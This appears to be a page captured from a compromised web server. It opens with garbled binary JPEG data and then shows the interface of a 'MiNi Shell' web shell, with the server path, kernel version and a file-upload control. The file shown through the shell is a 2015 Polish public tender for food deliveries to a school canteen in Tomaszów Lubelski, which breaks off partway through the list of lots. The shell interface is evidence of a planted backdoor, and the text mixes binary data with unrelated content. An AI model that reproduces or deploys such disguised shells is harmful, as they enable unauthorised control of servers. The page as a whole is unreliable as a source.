JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150803/196132-N-2015.html

<p class="kh_header"><b>Tomaszów Lubelski: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁOWKI SZKOLNEJ PRZY INTERNACIE ZESPOŁU SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM</b><br>
<b>Numer ogłoszenia: 196132 - 2015; data zamieszczenia: 03.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3.odt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁOWKI SZKOLNEJ PRZY INTERNACIE ZESPOŁU SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dostawa artykułów spożywczych do  stołówki szkolnej przy internacie Zespołu Szkół nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5.
Przedmiot zamówienia został podzielony na 14 CZĘŚCI od nr I do XIV .
Wspólny słownik kodów CPV: 15000000-8
CZĘŚĆ   I PIECZYWO			Kod CPV 15612500-6	
CZĘŚĆ  II MLEKO I JEGO PRZETWORY 	Kod CPV 15500000-3	
CZĘŚĆ  III MIĘSO wieprzowe i wyroby wędliniarskie Kod CPV 15100000-9,15131120-2
CZĘŚĆ  IV RÓŻNE PRODUKTY SPOZYWCZE	Kod CPV 15800000-6
CZĘŚĆ  V RYBY PRZETWORZONE I KONSERWOWANE Kod CPV 15200000-0
CZĘŚĆ  VI 	DRÓB				Kod CPV 15112000- 6
CZĘŚĆ  VII 	MROŻONKI 			Kod CPV 15331100-8
CZĘŚĆ  VIII 	OWOCE  ŚWIEŻE		Kod CPV  03121000-5
CZĘŚĆ  IX 	WARZYWA 			Kod CPV 15300000-1 
CZĘŚĆ  X 	JAJA  KURZE			Kod CPV 03142500-3
CZĘŚĆ  XI 	PRODUKTY MĄCZNE  GOTOWE	Kod CPV 15851000-8
CZĘŚĆ  XII 	MAKARONY			Kod CPV 15850000-1
CZĘŚC  XIII      	ZIEMNIAKI 			Kod CPV 03212100-1
CZĘŚĆ XIV       WARZYWA SEZONOWE świeże  	Kod CPV 0322000-9

2.Szczegółowy opis każdej części zawierają Arkusze kalkulacyjne oferty,  jako załączniki   nr 1.1 do 1.14 do specyfikacji istotnych warunków zamówienia stanowiący integralną ich część..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 15.85.00.00-1, 03.21.21.00-1, 03.22.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia przez wykonawcę warunku zamawiający żąda załączenia do oferty oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy Pzp- załącznik nr 3 do SIWZ.
Ocena spełnienia przez wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tych warunków.
Ocena spełnienia przez wykonawców warunków w tym zakresie będzie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tych warunków.
Ocena spełnienia przez wykonawców warunków w tym zakresie będzie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tych warunków.
Ocena spełnienia przez wykonawców warunków w tym zakresie będzie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tych warunków.
Ocena spełnienia przez wykonawców warunków w tym zakresie będzie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty  oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza , względnie do podpisania również innych dokumentów złożonych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmiany w umowie w trakcie realizacji  dostawy w przypadkach niżej wymienionych.
1.1.Nie przewiduje się wzrostu cen podanych w ofercie bez względu na zaistniałą
w międzyczasie sytuację za wyjątkiem zmiany stawki podatku VAT, która następuje z mocy prawa.
2.Zamawiający przewiduje możliwość zmian postanowień umowy (art.144 ust.1 ustawy Pzp) i    określa warunki tej zmiany w zakresie:
2.1.  obniżenia cen towaru o procent zmiany ceny (okres promocji )  
2.2. zmiany nazwy towaru w przypadku, kiedy nowy towar spełnia wszystkie parametry towaru, który przestał być wytwarzany 
3. W przypadku zwiększenia, bądź ograniczenia ilości żywionych dzieci Zamawiający zastrzega sobie możliwość zmniejszenia bądź zwiększenia ilości zamawianych. Z tego tytułu Wykonawcy nie przysługuje żadne roszczenie finansowe ani prawne. 
4.każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego, jednak Zamawiający nie dopuszcza zmiany ceny netto na wyższą od oferowanej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsnr3.odt.pl/ogloszenia-i-przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3 w Tomaszowie lubelskim ul. Hallera 5 , 22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 11:00, miejsce: Zespół Szkół Nr 3 w Tomaszowie lubelskim  ul. Hallera 5 , 22-600 Tomaszów Lubelski 
sekretariat  szkoły  parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  zwykły  krojony    waga nie mniej jak 500g 	szt.	7000
Chleb razowy mieszany waga nie mniej jak 500g	szt.	200
Bułka zwykła waga nie mniej jak  50 g	Szt.	14 000
Bułka tarta 	kg	    150
Drożdżówka 100 g	szt.	2000
Pierożki ( z kaszą , kapusta ) waga nie mniej niż  60 g 
	szt.	4000
Pączek  waga nie mniej jak   60 g	szt.	500
Makowiec  500 g	szt.	20
Cebularz 	Szt.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko spożywcze  zaw.2%  tł. w opak. 1 l.	litr	3000
Śmietana zaw. 18 % tł.   litr	 100 
Śmietana Kubek  op.450 ml zaw.18%  tł.	szt.	 800
Masło ex .zawartość tł. 82,5%   op. 0.200 g 	kg 	300 
Twaróg półtłusty 	Kg.	 350 
Ser topiony  100 g	Szt.	1800 
Ser żółty półtłusty	kg	250
Jogurt  kubek  op. nie mniej 125 ml. 	szt	4400 
Serek wiejski  op. nie mniej jak 150 g	szt 	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.53.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO  i  WYROBY WĘDLINIARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso mielone wieprzowo-wołowe 	kg.	450			
Mięso  wieprzowe gulaszowe  II  kl.kg.	450 			
Karkówka   wieprzowa b/k 	kg	150			
Karkówka z kością 	kg	200
Schab  wieprzowy z kością kg.	650
Schab wieprzowy b/k	kg	100		
Wątroba wieprzowa	kg.	100 	
Żeberka  wieprzowe(Paski) kg.	200 
Boczek wędzony parzony	kg.	100 		
Baleron 	kg.	30			
Kiełbasa krakowska kg.	150	
Mielonka  wieprzowa Smaczek w galaretce 	kg.	100	
Kiełbasa zwyczajna	kg.	50 		
Kiełbasa łopatkowa	kg.	100 	
Kiełbasa wiejska 	kg.	300			
Kiełbasa szynkowa z kminkiem 	kg	420			
Pieczeń rzymska 	kg 	100			
Polędwica sopocka 	kg 	320			
Ogonówka 	kg	420			
Paróweczki szynkowe wieprzowe 	kg	150			
Szynka parzona  domowa 	kg	500			
Flaki krojone odgotowane  	kg	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.12-0, 15.13.11.20-2, 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały kryształ- paczkowany  op.1kg	900	Kg
Chrzan  tarty w słoiku op.  Nie mniej jak  160 g	70	Szt
Kakao ciemne holenderskie  sypkie  op. Nie mniej jak  100 g	60	Szt
Dżem wiśniowy op.  nie mniej jak 280g	400	Szt
Dżem  truskawkowy , op. nie mniej jak  280 g	400	Szt
Dżem  śliwkowy - nie mniej jak 280g	100	Szt
Marmolada owocowa op. 500 g	30	Szt
Fasolka konserwowa czerwona op.nie mniejsze jak 400g	40	szt
Fasolka konserwowa biała op. 400 g	30	Szt
Groszek konserwowy  op. nie mniej jak  400 g  	140	Szt
Gałka muszkatołowa mielona 20 g	10	Szt
Herbata granulowana 100 g 	120	Szt
Herbata  ekspresowa  op. zaw. 100 saszetek 	20	Op
Kawa inka  op. nie mniejsze jak 150 g	65	Szt
Keczup pikantny  op.  1000 g	150	Szt 
Keczup PIKANTNY  op. nie mniej jak  500 g	90	Szt
Koncentrat pomidorowy 30 % op. Nie mniej jak 200g 	280	Szt
Kukurydza konserwowa słodka  -Op. nie mniejsze jak 400 g 130	Szt
Kwasek cytrynowy  op. Nie mniej jak 20g	80	Szt
Majonez  dekoracyjny nie mniej  jak 700 g  Firmy Winiarylub inny równoważny	110	Szt
musztarda  delikatesowa  op. nie mniej 180g	100	Szt
Majeranek  torebka  op. 20g	110	Szt
Miód naturalny wielokwiatowy op. słoik  1300 kg	20	Szt
Ocet  spirytusowy 10 %  op. 05 l. 	10	Szt
Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub inny  równoważny 	130	Szt
Pieprz naturalny czarny mielony Op. nie mniej jak 20g 	300	Szt
Pieprz ziołowy torebka  op. 20 g	30	Szt
Papryka w proszku słodka mielona Op. nie mniej jak 20 g	220	Szt
Pietruszka susz-  natka op nie mniej jak 20g 	180	Szt
Koper susz nać  op. nie mniej jak 20 g	100	Szt
Przyprawa do potraw typu Vegeta lub inny równoważny op.200 g	150	Szt
Ryż biały  op. 1 kg	100	Kg
Rosołki drobiowe 120 g   Firmy Winiar lub inny równoważny	180	szt
Sól kuchenna  spożywcza 	150	Kg
Ziele angielskie torebka 15g	10	Szt
Liść laurowy  torebka 15 g	20	Szt
Mąka ziemniaczana  op. 1000 g	30	Kg
Mąka pszenna  luksusowa  typ 550  	370	Kg
Olej jadalny rzepakowy  op. 1 litr	90	Szt
Olej jadalny rzepakowy op. Nie mniej jak 3 l. 	110	szt
Margaryna  śniadaniowa z zaw. Olejów roślinnych op. 500 g	700	szt
Kasza jęczmienna  wiejska op.1000g	40	Kg
Kasza gryczana  op. 1000 g	100	Kg
Płatki kukurydziane  zwykłe op. 
nie mniej jak 425 g	100	Szt.
Ogórek konserwowy  poj. 0.9 l	300	Szt
Papryka konserwowa poj. 0,9 l 	250	Szt
Serek top. Krążki  op. 140 g	600	op
Serek top. plastry op. 150g	900	op
Konserwa turystyczna  nie mniejjak  op. 135g	900	Szt
Pasztet drobiowy nie mniej jak op.135g 	1200	Szt
Delikat do mięs Knor lub równoważny  op. 700 g	10	Szt
Delikat do ryb op. 700g	2	Szt
Delikat do drobiu op. 700 g	9	Szt
Sos ogrodowy sałatkowy op.900 g	18	Szt
Ptasie mleczko op. Nie mniej jak 500g	200	Op
Ciastka  pierniczki lukrowane op luz 	40	Kg 
Cukierki czekoladowe   Wedell  luz lub inny równoważny 	35	Kg
Czekolada   Wedel op. 100 g  lub  równoważny  	400	Szt
Ciastka pierniczki korzenne  luz	10	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.00.00-3, 15.87.00.00-7, 15.83.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z ryby morszczuk mrożony  SHP	Kg 	300
Filet śledziowy  b/skóry w zalewie  octowo-olejowej   	kg	150
Makrela wędzona 	Kg	100
Konserwa rybna śledz w pomidorach  op. nie mniej jak   170 g	Szt.	250
Konserwa rybna szprot w oleju op. nie mniej jak 170 g	Szt.	100
Paprykarz szczeciński op. 300 g	Szt.	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.24.00.00-2, 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet  drobiowy  świeży	Kg	450
Porcje rosołowe	Kg	100
Udka z kurczaka  świeża  	Kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka mrożona wielowarzywna 7 składnikowa Op.2,5 kg op	50 
Kalafior mrożony  Op.2.50 kg	op.	30 
Szpinak mrożony -  liśćop.2.50 kg 	op	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8, 15.33.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jabłka  gat. I 	kg	1600 
Gruszka 	Kg 	 200
Śliwka 	    kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WARZYWA.</p>
